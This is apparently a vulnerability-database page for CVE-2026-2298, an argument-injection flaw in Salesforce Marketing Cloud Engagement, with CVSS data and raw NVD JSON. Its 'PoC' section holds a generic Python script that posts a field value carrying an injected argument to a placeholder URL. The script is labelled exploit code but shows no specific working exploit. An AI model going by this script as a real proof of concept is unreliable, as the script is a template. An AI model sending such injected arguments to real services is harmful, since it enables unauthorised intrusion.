Security Vulnerability Report
中文
CVE-2026-2298 CVSS 9.4 CRITICAL

CVE-2026-2298

Published: 2026-03-23 20:16:26
Last Modified: 2026-03-24 15:54:09

Description

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 30th, 2026.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Salesforce Marketing Cloud Engagement < 2026-01-30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-2298 PoC Example # Target: Salesforce Marketing Cloud Engagement # Vulnerability: Argument Injection target_url = "https://target-api.example.com/vulnerable_endpoint" # Attempting to inject arguments into a command parameter # Common injection characters include ' ', '--', ';' payload = { "user_input": "legitimate_value --injected-argument malicious_value" } headers = { "User-Agent": "CVE-2026-2298-Scanner", "Content-Type": "application/json" } try: response = requests.post(target_url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check for behavioral changes.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2298", "sourceIdentifier": "[email protected]", "published": "2026-03-23T20:16:25.523", "lastModified": "2026-03-24T15:54:09.400", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 30th, 2026."}, {"lang": "es", "value": "Neutralización Inadecuada de Delimitadores de Argumentos en un Comando ('Inyección de Argumentos') vulnerabilidad en Salesforce Marketing Cloud Engagement permite la Manipulación del Protocolo de Servicios Web. Este problema afecta a Marketing Cloud Engagement: antes del 30 de enero de 2026."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://help.salesforce.com/s/articleView?id=005299346&type=1", "source": "[email protected]"}]}}